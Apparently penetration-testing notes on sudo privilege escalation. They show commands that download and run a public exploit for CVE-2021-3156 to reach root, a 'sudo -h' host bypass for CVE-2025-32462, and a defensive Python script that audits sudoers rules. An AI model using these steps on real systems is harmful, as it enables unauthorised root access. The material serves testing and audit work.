Sudo

SudoEdit

Sudo versions before 1.9.5p2 are susceptible to a heap-based buffer overflow (CVE-2021-3156), and a public PoC is available.

# Check the target's sudo version
$ sudo --version
Sudo version 1.8.31

# Download the PoC to the target
$ wget https://raw.githubusercontent.com/worawit/CVE-2021-3156/refs/heads/main/exploit_nss.py

# Assign execute permissions
$ chmod +x exploit_nss.py

# Run the exploit
$ ./exploit_nss.py
...
# id
uid=0(root) gid=0(root) groups=0(root),998(apache),1004(anita)

Host Bypass

Sudo versions before 1.9.17p1 are vulnerable to CVE-2025-32462: the -h (--host) option, intended only for listing privileges, was also honoured when running commands. If the sudoers file grants a user privileges on a host that isn't the current machine (and isn't ALL), that user can run commands as if they were on that other host.

For example, in the below sudoers configuration:

sudoers
# Host alias specification
Host_Alias     SERVERS        = host-1.example.local, host-2.example.local
Host_Alias     PROD           = host-1.example.local
x7331           SERVERS, !PROD = NOPASSWD:ALL

The rule expands to...

(host-1.example.local, host-2.example.local) and NOT (host-1.example.local)

...which leaves only host-2.example.local, so the rule grants x7331 NOPASSWD on host-2 and nothing on host-1:

# Test for sudo privileges
x7331@host-1:~$ sudo -l
Password:
Sorry, user x7331 may not run sudo on host-1.

# Test sudo with the internal host referenced in logs
x7331@host-1:~$ sudo -h host-2.example.local -l
Matching Defaults entries for x7331 on host-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User x7331 may run the following commands on host-2:
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
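The alias expansion described above ("SERVERS, !PROD" leaving only host-2) can be reproduced to audit a sudoers file for rules that grant privileges only on hosts other than the local one, i.e. the condition CVE-2025-32462 needs. This is an added example, not code from the page or from the sudo project; the sudoers text is constructed to mirror the page's snippet, and ALL is treated as a literal marker rather than a wildcard that later negations could narrow.

```python
import re
import socket

# Constructed sudoers fragment mirroring the page's example (not a real config).
SUDOERS = """
# Host alias specification
Host_Alias     SERVERS        = host-1.example.local, host-2.example.local
Host_Alias     PROD           = host-1.example.local
x7331           SERVERS, !PROD = NOPASSWD:ALL
"""

ALIAS_KEYWORDS = ("Host_Alias", "User_Alias", "Cmnd_Alias", "Runas_Alias", "Defaults")


def parse_host_aliases(text):
    """Collect 'Host_Alias NAME = a, b' definitions into a name -> set-of-hosts map."""
    aliases = {}
    for line in text.splitlines():
        m = re.match(r"\s*Host_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = {h.strip() for h in m.group(2).split(",")}
    return aliases


def expand_host_list(spec, aliases):
    """Evaluate a host list such as 'SERVERS, !PROD' into the set of hosts it allows.

    Items are applied left to right: a plain item adds its hosts, a '!' item removes
    them, which matches sudo's rule that the last matching item decides.
    """
    allowed = set()
    for item in (i.strip() for i in spec.split(",")):
        name = item.lstrip("!")
        hosts = aliases.get(name, {name})  # unknown names are literal hostnames
        allowed = allowed - hosts if item.startswith("!") else allowed | hosts
    return allowed


def remote_only_rules(text, local_host):
    """Return (user, hosts, cmdspec) for rules that apply to other hosts but not local_host.

    On an unpatched sudo these are the entries a user could reach with 'sudo -h'.
    """
    aliases = parse_host_aliases(text)
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith(ALIAS_KEYWORDS):
            continue
        m = re.match(r"(\S+)\s+(.+?)\s*=\s*(.+)", line)
        if not m:
            continue
        hosts = expand_host_list(m.group(2), aliases)
        if "ALL" not in hosts and local_host not in hosts:
            findings.append((m.group(1), sorted(hosts), m.group(3)))
    return findings


if __name__ == "__main__":
    for user, hosts, cmd in remote_only_rules(SUDOERS, socket.getfqdn()):
        print(f"{user}: {cmd} only on {', '.join(hosts)}")
```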
